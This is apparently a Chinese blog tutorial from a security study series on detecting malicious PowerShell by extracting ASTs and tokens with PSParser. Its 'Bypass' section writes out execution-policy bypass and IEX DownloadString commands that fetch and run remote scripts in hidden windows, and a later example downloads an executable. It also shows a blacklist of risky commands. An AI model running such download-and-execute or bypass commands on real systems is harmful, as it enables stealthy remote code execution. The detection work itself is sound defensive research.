开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 网络协议 -> [网络安全提高篇] 一一五.Powershell恶意代码检测 (3)Token关键词自动提取 -> 正文阅读

[网络协议][网络安全提高篇] 一一五.Powershell恶意代码检测 (3)Token关键词自动提取

“网络安全提高班”新的100篇文章即将开启，包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结，它将更加聚焦，更加深入，也是作者的慢慢成长史。换专业确实挺难的，Web渗透也是块硬骨头，但我也试试，看看自己未来四年究竟能将它学到什么程度，漫漫长征路，偏向虎山行。享受过程，一起加油~

前文简单介绍了抽象语法树的抽取方法，通过官方提供的接口实现，包括抽象语法树可视化和节点提取。这篇文章将详细介绍Token关键词的抽取方法，它是指Powershell中具有特定含义的字段，主要通过官方提供的接口实现。希望这篇文章对您有帮助，也推荐大家去阅读论文，且看且珍惜。

作者作为网络安全的小白，分享一些自学基础教程给大家，主要是关于安全工具和实践操作的在线笔记，希望您们喜欢。同时，更希望您能与我一起操作和进步，后续将深入学习网络安全和系统安全知识并分享相关实验。总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！如果文章对您有帮助，将是我创作的最大动力，点赞、评论、私聊均可，一起加油喔~

自学篇工具：https://github.com/eastmountyxz/NetworkSecuritySelf-study
系统安全：https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis

声明：本人坚决反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。

提高篇：（自学系列100篇目录放在文章末尾）

一.Powershell基础知识

1.高威胁

近年来，Powershell 由于其易用性强、隐蔽性高的特点被广泛应用于 APT 攻击中，传统的基于人工特征提取和机器学习方法的恶意代码检测技术在 Powershell 恶意代码检测中越来越难以有效。

在这里插入图片描述

Microsoft 的 PowerShell 是一种命令行 shell 和脚本语言，默认安装在 Windows 机器上。它基于微软的.NET 框架，包括一个允许程序员访问操作系统服务的接口。虽然管理员可以配置 PowerShell 以限制访问和减少漏洞，但可以绕过这些限制。此外，PowerShell 命令可以轻松地动态生成、从内存中执行、编码和混淆，从而使 PowerShell 执行的代码的日志记录和取证分析具有挑战性。

由于这些原因，PowerShell 越来越多地被网络犯罪分子用作其攻击工具链的一部分，主要用于下载恶意内容和横向移动。事实上，赛门铁克最近一份关于 PowerShell 被网络犯罪分子滥用的综合技术报告报告称，他们收到的恶意 PowerShell 样本数量以及使用 PowerShell 的渗透工具和框架的数量急剧增加。这凸显了开发检测恶意 PowerShell 命令的有效方法的迫切需要。

2.基础语法

此外，在渗透测试中，Powershell是不能忽略的一个环节，而且仍在不断地更新和发展，它具有良好的灵活性和功能化管理Windows系统的能力。一旦攻击者可以在一台计算机上运行代码，就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写到磁盘中执行，它就可以直接在内存中运行。

这些特点使得PowerShell在获得和保持对系统的访问权限时，成为攻击者首选的攻击手段，利用PowerShell的诸多特点，攻击者可以持续攻击而不被轻易发现。常用的PowerShell攻击工具有以下几种。

PowerSploit
这是众多PowerShell攻击工具中被广泛使用的PowerShell后期漏洞利用框架，常用于信息探测、特权提升、凭证窃取、持久化等操作。
Nishang
基于PowerShell的渗透测试专用工具，集成了框架、脚本和各种Payload，包含下载和执行、键盘记录、DNS、延时命令等脚本。
Empire
基于PowerShell的远程控制木马，可以从凭证数据库中导出和跟踪凭据信息，常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制。
PowerCat
PowerShell版的NetCat，有着网络工具中的“瑞士军刀”美誉，它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向，读者可以在脚本中以多种方式使用它。

在PowerShell下，类似“cmd命令”叫作“cmdlet”，其命名规范相当一致，都采用“动词-名词”的形式，如New-Item，动词部分一般为Add、New、Get、Remove、Set等，命名的别名一般兼容Windows Command和Linux Shell，如Get-ChildItem命令使用dir或ls均可，而且PowerShell命令不区分大小写。

下面以文件操作为例讲解PowerShell命令的基本用法。

新建目录：New-Item whitecellclub-ItemType Directory
新建文件：New-Item light.txt-ItemType File
删除目录：Remove-Item whitecellclub
显示文件内容：Get-Content test.txt
设置文件内容：Set-Content test.txt-Value “hello,world!”
追加内容：Add-Content light.txt-Value “i love you”
清除内容：Clear-Content test.txt

举个简单的示例：

New-Item test -ItemType directory
Remove-Item test
New-Item eastmount.txt -ItemType file -value "hello csdn"  

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

在这里插入图片描述

3.Bypass

经过测试，在cmd窗口执行过程下载的PowerShell脚本，不论当前策略，都可以直接运行。而如果要在PowerShell窗口运行脚本程序，必须要管理员权限将Restricted策略改成Unrestricted，所以在渗透时，就需要采用一些方法绕过策略来执行脚本。

(1) 下载远程PowerShell脚本绕过权限执行
调用DownloadString函数下载远程的ps1脚本文件。

//cmd窗口执行以下命令
powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

//在powershell窗口执行
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

下图引用谢公子的图片，切换到CMD窗口运行。

在这里插入图片描述

(2) 绕过本地权限执行
上传xxx.ps1至目标服务器，在CMD环境下，在目标服务器本地执行该脚本，如下所示。

PowerShell.exe -ExcutionPolicy Bypass -File xxx.ps1

powershell -exec bypass  .\test.ps1

在这里插入图片描述

(3) 本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File xxx.ps1

举个示例：

powershell.exe -exec bypass -W hidden -nop test.ps1

(4) 用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden-NoProfile
-NonIIEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

函数定义：

function Test-MrParameter {

    param (
        [string]$ComputerName
    )

    Write-Output $ComputerName
	Write-Output ($ComputerName+$ComputerName)
	Write-Output ($ComputerName+$ComputerName+$ComputerName)
}

查看和使用函数：

Get-Command -Name Test-MrParameter -Syntax
Test-MrParameter -ComputerName 'this is a computer name'
pause

输出结果：

Test-MrParameter [[-ComputerName] <Object>]

this is a computer name
按 Enter 键继续...:

二.powershell.one

PowerShell 的抽象语法树作为代码的语义表达，以多叉树的形式表示脚本功能的逻辑结构，保留了代码上下文的特征并剔除无关的参数干扰，是分析功能类似的PowerShell代码的有效方法。常见方法是使用接口或编写自定义程序实现。前文介绍了第一种方法，这篇文章将介绍官方提供的接口。

Deobshell
https://github.com/thewhiteninja/deobshell
powershell.one => Convert-CodeToAst
https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree#ast-object-inheritance

Windows 为PowerShell提供了访问脚本AST的接口，使用内置接口获取的 AST 结构如图所示。

在这里插入图片描述

The Abstract Syntax Tree (AST) groups tokens into meaningful structures and is the most sophisticated way of analyzing PowerShell code.

1.概念

PowerShell解析器将单个字符转换为有意义的关键字并区分例如命令、参数和变量，这称为标记化，之前已介绍过。例如，编辑器使用这些标记为代码着色并以与命令不同的颜色显示变量。

解析器并不止于此。为了让PowerShell执行代码，它需要知道各个令牌如何形成可以执行的结构。解析器获取标记并构建一个抽象语法树（AST），它基本上将标记分组为有意义的结构。

在这里插入图片描述

抽象语法树之所以称为树，是因为它的工作方式类似于分层树。PowerShell从第一个标记开始，然后采用PowerShell语言定义（语法）来查看下一个可能的标记可能是什么。这样，解析器就可以通过代码工作。

情况1：PowerShell成功并创建代码的有效结构
情况2：遇到并引发语法错误

在这里插入图片描述

2.访问AST

从PowerShell 3 开始，抽象语法树向您公开，因此您现在也可以分析PowerShell代码并了解其内部结构。访问 AST 的主要方法有两种：

ScriptBlock（代码块）：一个scriptblock是一个有效的PowerShell代码块，所以它已经被解析器处理过了，并且解析器保证代码中没有语法错误。每个scriptblock都有一个名为AST的属性，它公开了scriptblock中包含的代码的抽象语法树。
Parser（解析器）：您可以要求PowerShell解析器解析任意代码并返回令牌和AST。当您输入和执行代码时，您基本上是在模仿PowerShell所做的事情。因为解析器处理原始文本，所以不能保证代码在语法上是正确的。这就是解析器还返回它发现的任何语法错误的原因。

查看AST的简单示例如下图所示，您可以查看解析器构建的抽象语法树(AST)。

$code.Invoke()
$code = { "Hello" * 10 }
$code.Ast

输出结果如下图所示：

在这里插入图片描述

这可以用来创建一个简单的测试函数来识别PowerShell代码

function Test-PowerShellCode
{
    param
    (
        [string]
        $Code
    )

    try
    {
        # try and convert string to scriptblock:
        $null = [ScriptBlock]::Create($Code)
    }
    catch
    {
        # the parser is invoked implicitly and returns
        # syntax errors as exceptions:
        $_.Exception.InnerException.Errors
    }
}

抽象语法树(AST) 是Ast对象的树。这棵树的顶部是解析器返回给您的内容。遍历抽象语法树时遇到的任何Ast对象都具有Parent和Extent属性。Parent定义树关系，Extent定义Ast对象涵盖的PowerShell代码。

常见方法如下：

Name                   Signature
----                   ---------
Copy                   System.Management.Automation.Language.Ast Copy()
Find                   System.Management.Automation.Language.Ast Find(System.Func[System.Management.Automation.Language.Ast,bool] predicate, bool searchNestedScriptBlocks)
FindAll                System.Collections.Generic.IEnumerable[System.Management.Automation.Language.Ast] FindAll(System.Func[System.Management.Automation.Language.Ast,bool] predicate, b...
Visit                  System.Object Visit(System.Management.Automation.Language.ICustomAstVisitor astVisitor), void Visit(System.Management.Automation.Language.AstVisitor astVisitor)

三.Tokenizing PowerShell Scripts

通过将 PowerShell 代码转换为标记和结构，您可以发现错误、自动记录您的代码并创建强大的重构工具。

https://powershell.one/powershell-internals/parsing-and-tokenization/simple-tokenizer

在这里插入图片描述

1.Token多彩的世界

每当您将PowerShell代码加载到专门的编辑器中时，代码都会被神奇地着色，如下图VS Code所示，并且每种颜色都代表一个给定的标记类型。颜色可以帮助您了解PowerShell如何解释您的代码。

在这里插入图片描述

没有内置PowerShell引擎（如notepad++或VSCode）的通用编辑器使用复杂的正则表达式来尝试正确识别tokens。然而，想要100%精确的tokens，可以直接使用PowerShell解析器（PowerShell Parser），而不是通用RegEx规则。在本文中，我们将分享PowerShell解析器的优点。

Token：本文理解为关键字段，自动解析每个标签的含义，比如变量定义、函数、关键词等。

接下来您将获得一个新的命令：

Test-PSOneScript

它能解析一个或数千个PowerShell文件并立即返回100%准确的Token。它是我们 PSOneTools 模块的一部分，因此只需安装最新版本即可使用该命令，或使用提供的源代码。

Install-Module -Name PSOneTools -Scope CurrentUser -Force

当我们得到Token（令牌）后，还可以做很多有趣的事情，例如：

自动记录代码并创建在脚本中找到的变量、命令或方法调用列表
识别导致解析器阻塞的语法错误
使用有风险的命令执行安全分析并识别脚本

2.PSParser 概述

PSParser是PowerShell早期版本中内置的原始解析器。尽管它很旧，但它仍然是所有PowerShell版本的一部分，并且由于其简单性而非常有用。

它区分了 20 种不同的令牌类型：

在这里插入图片描述

PS> [Enum]::GetNames([System.Management.Automation.PSTokenType]).Count
20

PS> [Enum]::GetNames([System.Management.Automation.PSTokenType]) | Sort-Object
Attribute
Command
CommandArgument
CommandParameter
Comment
GroupEnd
GroupStart
Keyword
LineContinuation
LoopLabel
Member
NewLine
Number
Operator
Position
StatementSeparator
String
Type
Unknown
Variable

当您使用PSParser对PowerShell代码进行标记时，它会逐个字符地读取您的代码并将这些字符分组为有意义的单词，即tokens。如果PSParser遇到它不期望的字符，它会生成Syntax Errors，即当字符串以双引号开头但以单引号结尾时。

3.Tokenizing PowerShell

使用 Tokenize() 对PowerShell 代码进行标记。这是一个简单的例子，假设存在“get_token_001.ps1”代码。

在这里插入图片描述

Tokenize()需要您要标记的代码，以及一个可以填充任何语法错误的空变量。因为变量$errors在Tokenize启动时是空的，并且在方法解析代码时被填充，所以它需要通过引用（内存指针）提交，这在PowerShell中是通过[ref]完成的。

当Tokenize()完成时，您会在变量tokens中收到所有令牌作为返回值，以及errors中的任何语法错误。

$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
$syntaxError = $errors | Select-Object -ExpandProperty Token -Property Message

具体代码如下：

# the code that you want tokenized:
$code = {
  # this is some test code
  $service = Get-Service |
    Where-Object Status -eq Running
}


# create a variable to receive syntax errors:
$errors = $null
# tokenize PowerShell code:
$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)

# analyze errors:
if ($errors.Count -gt 0)
{
  # move the nested token up one level so we see all properties:
  $syntaxError = $errors | Select-Object -ExpandProperty Token -Property Message
  $syntaxError
}
else
{
  $tokens
}

输出结果如下图所示，每个Token都由一个PSToken对象表示，该对象以字符串形式返回令牌内容、令牌类型以及找到令牌的确切位置。

在这里插入图片描述

注释

Content     : # this is some test code
Type        : Comment
Start       : 4
Length      : 24
StartLine   : 2
StartColumn : 3
EndLine     : 2
EndColumn   : 27

变量

Content     : service
Type        : Variable
Start       : 32
Length      : 8
StartLine   : 3
StartColumn : 3
EndLine     : 3
EndColumn   : 11

运算

Content     : =
Type        : Operator
Start       : 41
Length      : 1
StartLine   : 3
StartColumn : 12
EndLine     : 3
EndColumn   : 13

命令


Content     : Get-Service
Type        : Command
Start       : 43
Length      : 11
StartLine   : 3
StartColumn : 14
EndLine     : 3
EndColumn   : 25

Content     : Where-Object
Type        : Command
Start       : 62
Length      : 12
StartLine   : 4
StartColumn : 5
EndLine     : 4

实参和形参

Content     : Status
Type        : CommandArgument
Start       : 75
Length      : 6
StartLine   : 4
StartColumn : 18
EndLine     : 4
EndColumn   : 24

Content     : Running
Type        : CommandArgument
Start       : 86
Length      : 7
StartLine   : 4
StartColumn : 29
EndLine     : 4
EndColumn   : 36

如果解析器在解析代码时遇到意外字符，则会生成语法错误。解析器继续解析，因此可能会返回多个语法错误。解析器为每个语法错误发出一个PSParseError对象，如下所示：

在这里插入图片描述

四.Token提取实例

要检查真正的基于文件的脚本，只需将上面的逻辑嵌入到管道感知函数中。Test-PSOneScript 正是这样做的，并使解析PowerShell文件变得轻而易举：

function Test-PSOneScript
{
  <#
      .SYNOPSIS
      Parses a PowerShell Script (*.ps1, *.psm1, *.psd1)

      .DESCRIPTION
      Invokes the simple PSParser and returns tokens and syntax errors

      .EXAMPLE
      Test-PSOneScript -Path c:\test.ps1
      Parses the content of c:\test.ps1 and returns tokens and syntax errors

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Out-GridView

      parses all PowerShell files found anywhere in your user profile

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Where-Object Errors

      parses all PowerShell files found anywhere in your user profile
      and returns only those files that contain syntax errors

      .LINK
      https://powershell.one
  #>

  param
  (
    # Path to PowerShell script file
    # can be a string or any object that has a "Path" 
    # or "FullName" property:
    [String]
    [Parameter(Mandatory,ValueFromPipeline)]
    [Alias('FullName')]
    $Path
  )
  
  begin
  {
    $errors = $null
  }
  process
  {
    # create a variable to receive syntax errors:
    $errors = $null
    # tokenize PowerShell code:
    $code = Get-Content -Path $Path -Raw -Encoding Default
    
    # return the results as a custom object
    [PSCustomObject]@{
      Name = Split-Path -Path $Path -Leaf
      Path = $Path
      Tokens = [Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
      Errors = $errors | Select-Object -ExpandProperty Token -Property Message
    }  
  }
}

由于本文主要针对Powershell文件的token提取，所以检查语法错误的功能建议读者查看官方网站。

1.基础用法

解析单个文件，只需将其路径提交到Test-PSOneScript，它立即返回标记和任何语法错误（如果存在）。

$Path = "C:\Users\tobia\test.ps1"
$result = Test-PSOneScript -Path $Path

本文尝试解析“data\example-004.ps1”文件。该文件的Powershell内容如下：

$service = Get-Service | Where-Object Status -eq Running

在这里插入图片描述

(1) 提取AST

这里先给出一张上一篇文章解析的抽象语法树（AST）图。

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps文件名称
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 提取ps文件中的内容 
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-content $str
  Write-Output $content

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($content)

  # 提取AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id, $Indent = 0)
  {
    # 每级缩进
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # 输出AST对象
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent
    
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()
      # 递归其子节点（if any)
      if ($hierarchy.ContainsKey($newid)) {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result
}

Convert-CodeToAst -str .\data\example-004.ps1

输出结果如下所示：

在这里插入图片描述

(2) 提取Token

提取单个文件Token的代码如下所示：

function Test-PSOneScript
{
  <#
      .SYNOPSIS
      Parses a PowerShell Script (*.ps1, *.psm1, *.psd1)

      .DESCRIPTION
      Invokes the simple PSParser and returns tokens and syntax errors

      .EXAMPLE
      Test-PSOneScript -Path c:\test.ps1
      Parses the content of c:\test.ps1 and returns tokens and syntax errors

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Out-GridView

      parses all PowerShell files found anywhere in your user profile

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Where-Object Errors

      parses all PowerShell files found anywhere in your user profile
      and returns only those files that contain syntax errors

      .LINK
      https://powershell.one
  #>

  param
  (
    # Path to PowerShell script file
    # can be a string or any object that has a "Path" 
    # or "FullName" property:
    [String]
    [Parameter(Mandatory,ValueFromPipeline)]
    [Alias('FullName')]
    $Path
  )
  
  begin
  {
    $errors = $null
  }
  process
  {
    # create a variable to receive syntax errors:
    $errors = $null
    # tokenize PowerShell code:
    $code = Get-Content -Path $Path -Raw -Encoding Default
    Write-Output $code
    
    # return the results as a custom object
    [PSCustomObject]@{
      Name = Split-Path -Path $Path -Leaf
      Path = $Path
      Tokens = [Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
      Errors = $errors | Select-Object -ExpandProperty Token -Property Message
    }  
  }
}

# 执行函数
$Path = ".\data\example-004.ps1"
$result = Test-PSOneScript -Path $Path
$errors = $result.Errors.Count -gt 0
$tokens = $result.Tokens.Type | Sort-Object -Unique

# 输出结果
Write-Output ($result)
Write-Output ($errors,"`n")
Write-Output ($tokens)

其中，检查脚本文件是否有语法错误的核心代码如下：

$result.Errors.Count -gt 0
False

获取脚本中存在的所有令牌类型的列表核心代码如下：

$result.Tokens.Type | Sort-Object -Unique

最终输出结果如下图所示：

在这里插入图片描述

如果输入代码是“$a = 1”，则输出结果如下图所示：

在这里插入图片描述

(3) 提取变量和命令列表

要获取脚本中使用的所有变量的列表，只需过滤标记类型Variable。同样，如果您想获取脚本使用的命令列表，请过滤适当的令牌类型 ( Command )。

# 执行函数
$Path = ".\data\example-004.ps1"
$result = Test-PSOneScript -Path $Path
$errors = $result.Errors.Count -gt 0
$tokens = $result.Tokens.Type | Sort-Object -Unique
Write-Output ($result)
Write-Output ($errors,"`n")
Write-Output ($tokens,"`n")

# 提取变量列表
$variables = $result.Tokens | 
  Where-Object Type -eq Variable | 
  Sort-Object -Property Content -Unique | 
  ForEach-Object { '${0}' -f $_.Content}
Write-Output ("Get Variables:")
Write-Output ($variables,"`n")

# 提取命令列表
$commands = $result.Tokens | 
  Where-Object Type -eq Command | 
  Sort-Object -Property Content -Unique | 
  Select-Object -ExpandProperty Content
Write-Output ("Get Commands:")
Write-Output ($commands,"`n")

# 提取.NET方法列表
$members = $result.Tokens | 
  Where-Object Type -eq Member | 
  Select-Object -ExpandProperty Content |
  Sort-Object -Unique
Write-Output ("Get Members:")
Write-Output ($members,"`n")

在这里插入图片描述

您甚至可以分析命令的使用频率。这将为您提供 10 个最常用的命令。

PS> $result.Tokens | 
  Where-Object Type -eq Command | 
  Select-Object -ExpandProperty Content |
  Group-Object -NoElement |
  Sort-Object -Property Count -Descending |
  Select-Object -First 10

Count Name                     
----- ----                     
   51 Search-AD                
   49 New-Object               
   35 Write-Verbose            
   29 get-date                 
   25 %                        
   24 New-TimeSpan             
   24 Where                    
   21 select                   
   19 Sort-Object              
   17 Invoke-Method

2.批量分析

Test-PSOneScript不能一次只检查一个文件。它完全支持管道，并且知道如何处理Get-ChildItem.

(1) 查找有错误的脚本
如果您想在脚本库中的任何位置识别具有语法错误的脚本，只需运行Get-ChildItem以收集要测试的文件，并将它们通过管道传输到Test-PSOneScript如下所示：

# get all PowerShell files from your user profile...
Get-ChildItem -Path $home -Recurse -Include *.ps1, *.psd1, *.psm1 -File |
  # ...parse them...
  Test-PSOneScript |
  # ...filter those with syntax errors...
  Where-Object Errors |
  # ...expose the errors:
  ForEach-Object {
    [PSCustomObject]@{
      Name = $_.Name
      Error = $_.Errors[0].Message
      Type = $_.Errors[0].Type
      Line = $_.Errors[0].StartLine
      Column = $_.Errors[0].StartColumn
      Path = $_.Path
    }
  }

(2) 识别有风险的命令
如果您想识别使用有风险命令的脚本，例如Invoke-Expression，只需调整过滤器。

$blacklist = @('Invoke-Expression', 'Stop-Computer', 'Restart-Computer')


# get all PowerShell files from your user profile...
Get-ChildItem -Path $home -Recurse -Include *.ps1, *.psd1, *.psm1 -File |
# ...parse them...
Test-PSOneScript |
# ...filter those using commands in our blacklist
Foreach-Object {
  # get the first token that is a command and that is in our blacklist
  $badToken = $_.Tokens.Where{$_.Type -eq 'Command'}.Where{$_.Content -in $blacklist} | 
    Select-Object -First 1
  
  if ($badToken)
  {
    $_ | Add-Member -MemberType NoteProperty -Name BadToken -Value $badToken -PassThru
  }
  } |
  # ...expose the errors:
  ForEach-Object {
    [PSCustomObject]@{
      Name = $_.Name
      Offender = $_.BadToken.Content
      Line = $_.BadToken.StartLine
      Column = $_.BadToken.StartColumn
      Path = $_.Path
    }
  }

3.提取token对应的text

前面3.3部分介绍了一个案例，主要是调用PSToken Class提取Token内容，其属性是可以直接调用的。因此，接下来我们尝试提取token对应的text。

在这里插入图片描述

完整代码如下：

# 函数：提取Token内容
function Test-PSOneScript
{
  <#
      .SYNOPSIS
      Parses a PowerShell Script (*.ps1, *.psm1, *.psd1)

      .DESCRIPTION
      Invokes the simple PSParser and returns tokens and syntax errors

      .EXAMPLE
      Test-PSOneScript -Path c:\test.ps1
      Parses the content of c:\test.ps1 and returns tokens and syntax errors

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Out-GridView

      parses all PowerShell files found anywhere in your user profile

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Where-Object Errors

      parses all PowerShell files found anywhere in your user profile
      and returns only those files that contain syntax errors

      .LINK
      https://powershell.one
  #>

  param
  (
    # Path to PowerShell script file
    # can be a string or any object that has a "Path" 
    # or "FullName" property:
    [String]
    [Parameter(Mandatory,ValueFromPipeline)]
    [Alias('FullName')]
    $Path
  )
  
  begin
  {
    $errors = $null
  }
  process
  {
    # create a variable to receive syntax errors:
    $errors = $null
    # tokenize PowerShell code:
    $code = Get-Content -Path $Path -Raw -Encoding Default
    Write-Output $code
    
    # return the results as a custom object
    [PSCustomObject]@{
      Name = Split-Path -Path $Path -Leaf
      Path = $Path
      Tokens = [Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
      Errors = $errors | Select-Object -ExpandProperty Token -Property Message
    }  
  }
}

# 执行函数
$Path = ".\data\example-004.ps1"
$result = Test-PSOneScript -Path $Path
$errors = $result.Errors.Count -gt 0
$tokens = $result.Tokens.Type | Sort-Object -Unique
Write-Output ($result)
Write-Output ($errors,"`n")
Write-Output ($tokens,"`n")

# 提取变量列表
$variables = $result.Tokens | 
  Where-Object Type -eq Variable | 
  Sort-Object -Property Content -Unique | 
  ForEach-Object { '${0}' -f $_.Content}
Write-Output ("Get Variables:")
Write-Output ($variables,"`n")

# 提取命令列表
$commands = $result.Tokens | 
  Where-Object Type -eq Command | 
  Sort-Object -Property Content -Unique | 
  Select-Object -ExpandProperty Content
Write-Output ("Get Commands:")
Write-Output ($commands,"`n")

# 提取Token内容
$token_texts = $result.Tokens.Content
Write-Output ($token_texts.GetType())
$strToken = ''
foreach($elem in $token_texts) {
  $elem = $elem | Out-String   #Object转String
  $text = $elem.Trim()
  if($strToken.Length -ne 0) {  #不等于
    $text = " " + $text
  }
  $strToken = $strToken + $text
}
Write-Output ("Get Texts:")
Write-Output ($strToken,$strToken.Length)

输出结果如下图所示：

在这里插入图片描述

提取的Token被空格拼接，比如：

service = Get-Service | Where-Object Status -eq Running
powershell ( new-object system.net.webclient ) . downloadfile ( http://192.168.10.11/test.exe , test.exe ) ;

五.自动提取Powershell的AST和Token实例

最后作者结合上一篇文章提取CSV文件中的代码，实现AST和Token提取。其中CSV文件如下：

在这里插入图片描述

完整代码如下：

#------------------------------------------------------
# 第一部分：批量读取文件
# By: Eastmount CSDN 2022-03-12
#------------------------------------------------------
function Read_csv_powershell 
{
  param (
    [parameter(Mandatory=$true)]
    [System.String]$inputfile,
    [System.String]$outputfile
  )

  # 读取CSV文件
  $content = Import-CSV $inputfile
  $list = [System.Collections.ArrayList]@()
  foreach($line in $content) {
    $no = $line.("no")
    $code = $line.("decoded code")
    $name = $line.("family name")
    # Write-Output($no, $code, $name)

    # 转换抽象语法树AST和Token
    try {
      $ast = Convert-CodeToAst -str $code
      Write-Output($ast)
      $token = get_token_text -str $code
      Write-Output($token)
    } 
    catch [System.Exception] {
      'exception info:{0}' -f $_.Eception.Message
      continue
    }
    $list.add([PSCustomObject]@{
      no = $no
      code = $code
      name = $name
      ast = $ast
      token = $token
    })
  }
  $list | ConvertTo-Csv -NoTypeInformation | out-file $outputfile -Encoding ascii -Force
  Write-Output($list)
}

#------------------------------------------------------
# 第二部分：提取并拼接AST节点内容
#------------------------------------------------------
function add_blanks 
{
    param (
      [parameter(Mandatory=$true)]
      [System.Array]$arr
    )
    $strNode = ''
    foreach($elem in $arr) {
        if($strNode.Length -ne 0) { #不等于
            $elem = " " + $elem
        }
        $strNode = $strNode + $elem
    }
    return $strNode
}

# 函数：提取Powershell代码的抽象语法树(AST)
function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps代码
  )

  # 构建hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($str)

  # 提取AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # 递归可视化树
  function Visualize-Tree($Id)
  {
    # 每级缩进
    $hierarchy[$id] | ForEach-Object {
      # 获取当前AST对象的id
      $newid = $_.GetHashCode()

      # 递归其子节点（if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      $null = $result.Add($_.GetType().Name)
    }
  }

  # 使用AST根对象开始可视化
  Visualize-Tree -id $code.Ast.GetHashCode()
  # Write-Output ($result,"`n")

  # result存储根节点内容
  $strNode = add_blanks -arr $result
  return $strNode
}

#------------------------------------------------------
# 第三部分：提取并拼接Token内容
#------------------------------------------------------
# 函数：拼接Token内容
function get_token_text 
{
  param (
    [Parameter(Mandatory)]   # 强制参数
    [System.String]$str      # 执行ps代码
  )

  # 创建Scipt代码块
  $code = [ScriptBlock]::Create($str)

  # 提取token
  $errors = $null
  $tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
  $syntaxError = $errors | Select-Object -ExpandProperty Token -Property Message
  $token_texts = $tokens.Content
  # Write-Output ($token_texts)

  # 拼接字符串
  $strToken = ''
  foreach($elem in $token_texts) {
    $elem = $elem | Out-String   #Object转String
    $text = $elem.Trim()
    if($strToken.Length -ne 0) {  #不等于
      $text = " " + $text
    }
    $strToken = $strToken + $text
  }
  # Write-Output ("Get Texts:")
  # Write-Output ($strToken,$strToken.Length)

  return $strToken
}

#------------------------------------------------------
# 主函数：读取CSV文件并提取AST和Token
#------------------------------------------------------
$inputCSV = '.\data\data.csv'
$outputCSV = '.\data\data_AST_Token.csv'
Read_csv_powershell -inputfile $inputCSV -outputfile $outputCSV

